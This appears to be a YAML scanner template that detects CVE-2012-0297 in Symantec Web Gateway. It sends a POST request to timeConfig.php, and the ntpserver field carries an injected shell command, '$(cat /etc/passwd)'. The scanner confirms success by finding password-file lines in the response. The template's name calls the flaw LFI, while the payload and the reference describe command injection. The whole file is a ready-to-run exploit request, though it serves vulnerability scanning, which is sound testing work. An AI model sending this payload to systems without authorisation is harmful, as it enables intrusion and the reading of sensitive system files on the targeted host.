id: symantec-web-gateway-rce
info:
  name: Symantec Web Gateway - LFI (CVE-2012-0297)
  risk: High

params:
  - root: "{{.BaseURL}}"

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/spywall/timeConfig.php
    body: |
      posttime=1585228657&saveForm=Save&timesync=1&ntpserver=http://qweqwe.com;$(cat%20/etc/passwd);#&timezone=5
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'root:') && StringSearch("response", "bin/bash")

references:
  - link: https://packetstormsecurity.com/files/157163/Symantec-Web-Gateway-5.0.2.8-Remote-Code-Execution.html